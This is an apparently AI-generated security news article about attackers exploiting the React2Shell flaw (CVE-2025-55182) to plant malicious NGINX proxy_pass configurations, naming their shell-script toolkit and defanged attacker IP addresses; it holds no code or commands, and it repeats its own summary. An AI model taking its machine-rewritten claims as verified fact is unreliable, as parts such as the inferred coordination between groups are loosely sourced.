Ethical Hacking News
A critical web traffic hijacking campaign has been uncovered, exploiting the React2Shell vulnerability (CVE-2025-55182) in NGINX installations and management panels. The attackers have been using malicious configurations to route legitimate web traffic through their own backend servers, targeting Asian TLDs, Chinese hosting infrastructure, and government and educational TLDs. This exploit highlights the importance of keeping software up-to-date and emphasizes the need for robust cybersecurity measures to protect against such threats.
The React2Shell vulnerability (CVE-2025-55182) has been exploited by threat actors to hijack web traffic flowing through compromised NGINX servers, targeting Asian TLDs and Chinese hosting infrastructure. The attackers have used shell scripts to inject malicious configurations into NGINX, designed to capture incoming requests on certain predefined URL paths. A multi-stage toolkit is used to facilitate persistence and the creation of malicious configuration files incorporating the malicious directives. GreyNoise has observed that two IP addresses account for 56% of all observed exploitation attempts after React2Shell was publicly disclosed. The attackers' approach suggests an interest in interactive access rather than automated resource extraction, and they have employed coordinated reconnaissance campaigns to target Citrix ADC Gateway and Netscaler Gateway infrastructure.
The recent disclosure of a web traffic hijacking campaign, facilitated by the exploitation of the React2Shell vulnerability (CVE-2025-55182), has sent shockwaves through the cybersecurity community. This article will delve into the details of this exploit, its implications for NGINX installations and management panels, and the broader context in which it is situated.
The React2Shell vulnerability, rated at a critical severity level of 10.0 on the Common Vulnerability Scoring System (CVSS), has been widely exploited by threat actors to hijack web traffic flowing through compromised NGINX servers. According to Datadog Security Labs, the attackers have been using malicious NGINX configurations to intercept legitimate web traffic between users and websites, routing it through their own backend servers.
The attack campaign targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota Panel), and government and educational TLDs (.edu, .gov). The attackers have been using shell scripts to inject malicious configurations into NGINX, which are designed to capture incoming requests on certain predefined URL paths and redirect them to domains under the attackers' control via the "proxy_pass" directive.
The exploit involves a multi-stage toolkit that facilitates persistence and the creation of malicious configuration files incorporating the malicious directives. The components of this toolkit include:
* zx.sh: an orchestrator script that executes subsequent stages through legitimate utilities like curl or wget.
* bt.sh: a script that targets the Baota (BT) Management Panel environment to overwrite NGINX configuration files.
* 4zdh.sh: a script that enumerates common Nginx configuration locations and takes steps to minimize errors when creating the new configuration.
* zdh.sh: a script that adopts a narrower targeting approach by focusing mainly on Linux or containerized NGINX configurations and targeting top-level domains (TLDs) such as .in and .id.
* ok.sh: a script responsible for generating a report detailing all active NGINX traffic hijacking rules.
The toolkit also contains target discovery and several scripts designed for persistence and the creation of malicious configuration files containing directives intended to redirect web traffic. This exploit highlights the importance of keeping software up-to-date, particularly in instances where vulnerabilities are known.
The threat intelligence firm GreyNoise has observed that two IP addresses - 193.142.147[.]209 and 87.121.84[.]24 - account for 56% of all observed exploitation attempts two months after React2Shell was publicly disclosed. A total of 1,083 unique source IP addresses have been involved in React2Shell exploitation between January 26 and February 2, 2026.
The attackers' approach to the exploit suggests an interest in interactive access rather than automated resource extraction. This is further evidenced by the discovery of a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway infrastructure using tens of thousands of residential proxies and a single Microsoft Azure IP address ("52.139.3[.]76") to discover login panels.
The campaign ran two distinct modes: a massive distributed login panel discovery operation using residential proxy rotation, and a concentrated AWS-hosted version disclosure sprint. The fact that the attackers employed both approaches suggests complementary objectives of finding login panels and enumerating versions, indicating a level of coordination between different threat groups.
This article has provided an in-depth look at the React2Shell exploit and its implications for cybersecurity. As with all vulnerabilities, it is essential to remain vigilant and take proactive steps to protect your digital assets from such threats.
A critical web traffic hijacking campaign has been uncovered, exploiting the React2Shell vulnerability (CVE-2025-55182) in NGINX installations and management panels. The attackers have been using malicious configurations to route legitimate web traffic through their own backend servers, targeting Asian TLDs, Chinese hosting infrastructure, and government and educational TLDs. This exploit highlights the importance of keeping software up-to-date and emphasizes the need for robust cybersecurity measures to protect against such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/Hijacking-Web-Traffic-The-React2Shell-Exploit-and-its-Implications-for-Cybersecurity-ehn.shtml
https://thehackernews.com/2026/02/hackers-exploit-react2shell-to-hijack.html
https://www.csoonline.com/article/4127554/threat-actors-hijack-web-traffic-after-exploiting-react2shell-vulnerability-report.html
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
https://www.cvedetails.com/cve/CVE-2025-55182/
Published: Wed Feb 4 23:38:52 2026 by llama3.2 3B Q4_K_M
